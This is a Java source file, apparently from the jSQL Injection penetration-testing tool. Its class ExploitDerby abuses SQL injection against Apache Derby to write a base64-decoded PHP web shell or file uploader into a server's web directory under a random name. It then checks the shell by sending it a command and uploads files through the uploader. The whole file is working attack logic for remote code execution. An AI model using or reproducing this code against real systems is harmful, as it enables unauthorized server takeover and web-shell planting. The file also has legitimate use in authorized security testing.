View Javadoc
1   package com.jsql.model.accessible.vendor;
2   
3   import com.jsql.model.InjectionModel;
4   import com.jsql.model.accessible.DataAccess;
5   import com.jsql.model.accessible.ResourceAccess;
6   import com.jsql.model.accessible.vendor.derby.ModelYamlDerby;
7   import com.jsql.model.bean.util.Interaction;
8   import com.jsql.model.bean.util.Request;
9   import com.jsql.model.exception.JSqlException;
10  import com.jsql.model.exception.JSqlRuntimeException;
11  import com.jsql.util.LogLevelUtil;
12  import com.jsql.util.StringUtil;
13  import org.apache.commons.lang3.RandomStringUtils;
14  import org.apache.commons.lang3.StringUtils;
15  import org.apache.logging.log4j.LogManager;
16  import org.apache.logging.log4j.Logger;
17  import org.yaml.snakeyaml.Yaml;
18  
19  import java.io.File;
20  import java.io.FileInputStream;
21  import java.io.IOException;
22  import java.io.InputStream;
23  import java.net.http.HttpResponse;
24  import java.util.function.BinaryOperator;
25  
26  public class ExploitDerby {
27  
28      /**
29       * Log4j logger sent to view.
30       */
31      private static final Logger LOGGER = LogManager.getRootLogger();
32      private final InjectionModel injectionModel;
33      private final ModelYamlDerby modelYaml;
34  
35      public ExploitDerby(InjectionModel injectionModel) {
36          this.injectionModel = injectionModel;
37          var yaml = new Yaml();
38          this.modelYaml = yaml.loadAs(
39              injectionModel.getMediatorVendor().getDerby().instance().getModelYaml().getResource().getExploit(),
40              ModelYamlDerby.class
41          );
42      }
43  
44      public String createWeb(String pathExploit, String urlExploit) {
45          LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
46  
47          String bodyExploit = StringUtil.base64Decode(
48                  this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
49              )
50              .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
51              .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
52  
53          var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
54          var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
55          this.injectionModel.injectWithoutIndex(String.format(
56              this.modelYaml.getFile().getWrite(),
57              nameTable,
58              nameTable, bodyExploit.replace("'", "''"),
59              nameTable,
60              pathExploit + nameExploit
61          ), ResourceAccess.TBL_CREATE);
62  
63          BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
64              String result = this.injectionModel.getResourceAccess().callCommand(
65                  urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
66              );
67              if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
68                  LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
69                  return StringUtils.EMPTY;
70              }
71              var request = new Request();
72              request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
73              request.setParameters(urlSuccess);
74              this.injectionModel.sendToViews(request);
75              return urlSuccess;
76          };
77  
78          return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
79      }
80  
81      public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
82          String bodyExploit = StringUtil.base64Decode(
83                  this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
84              )
85              .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
86              .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
87  
88          var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
89          var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
90          this.injectionModel.injectWithoutIndex(String.format(
91              this.modelYaml.getFile().getWrite(),
92              nameTable,
93              nameTable, bodyExploit.replace("'", "''"),
94              nameTable,
95              pathExploit + nameExploit
96          ), ResourceAccess.TBL_CREATE);
97  
98          BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
99              try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
100                 HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
101                 if (result.body().contains(DataAccess.LEAD +"y")) {
102                     LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
103                 } else {
104                     LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
105                 }
106             } catch (InterruptedException e) {
107                 LOGGER.log(LogLevelUtil.IGNORE, e, e);
108                 Thread.currentThread().interrupt();
109             } catch (IOException | JSqlException e) {
110                 throw new JSqlRuntimeException(e);
111             }
112             return urlSuccess;
113         };
114 
115         this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
116     }
117 
118     public ModelYamlDerby getModelYaml() {
119         return this.modelYaml;
120     }
121 }